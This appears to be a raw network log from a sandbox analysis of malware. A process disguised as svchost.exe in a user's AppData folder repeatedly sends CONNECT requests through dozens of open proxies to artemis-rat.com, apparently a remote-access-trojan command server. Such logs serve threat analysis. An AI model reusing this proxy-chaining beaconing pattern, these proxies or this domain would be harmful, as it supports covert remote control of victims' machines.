Mar 9, 2024 13:14:28.870847940 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.880521059 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.880659103 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.677906990 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1907	192.168.2.5	55684	13.234.24.116	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.124212027 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.526865005 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:28 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1908	192.168.2.5	55770	5.135.83.214	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.124268055 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.603543997 CET	327	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1909	192.168.2.5	55435	117.160.250.134	8899	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.124272108 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.380073071 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.882812023 CET	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sat, 09 Mar 2024 12:14:29 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1910	192.168.2.5	55783	185.217.136.67	1337	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.124953032 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.870856047 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.880501986 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.880572081 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.677537918 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1911	192.168.2.5	55909	132.148.16.169	11320	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.125097036 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.583076000 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1912	192.168.2.5	55823	24.249.199.12	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.132450104 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1913	192.168.2.5	56121	43.157.44.79	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.134566069 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1914	192.168.2.5	56102	93.190.24.119	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.134758949 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1915	192.168.2.5	56125	93.190.24.119	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.135327101 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1916	192.168.2.5	55730	65.1.40.47	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.135329008 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.520915985 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:28 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1917	192.168.2.5	56126	93.190.24.119	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.136859894 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1918	192.168.2.5	56127	93.190.24.119	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.138068914 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1919	192.168.2.5	56128	43.157.44.79	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.141005993 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1920	192.168.2.5	56132	43.157.44.79	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.141664028 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1921	192.168.2.5	56134	43.157.44.79	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.142384052 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1922	192.168.2.5	55928	104.25.115.125	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.142682076 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.297307014 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1923	192.168.2.5	55760	222.223.103.232	7302	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.147018909 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.500946999 CET	90	IN	HTTP/1.1 200 OK Content-Type: application/json Connection: close Content-Length: 55

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1924	192.168.2.5	56142	43.157.50.206	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.150664091 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1925	192.168.2.5	55936	172.67.182.150	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.150746107 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.305038929 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1926	192.168.2.5	55950	104.24.136.68	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.159921885 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.314860106 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1927	192.168.2.5	55964	185.162.229.127	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.167937040 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.322302103 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1928	192.168.2.5	56150	43.157.50.206	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.170172930 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1929	192.168.2.5	55982	185.238.228.240	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.191651106 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.346004963 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1930	192.168.2.5	55992	172.67.36.21	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.191730022 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.346163034 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1931	192.168.2.5	55830	46.105.42.230	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.193963051 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.870918989 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.880501986 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.880582094 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.614147902 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1932	192.168.2.5	56004	104.25.184.189	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.194185019 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.348510981 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1933	192.168.2.5	55376	42.61.48.219	8000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.194215059 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
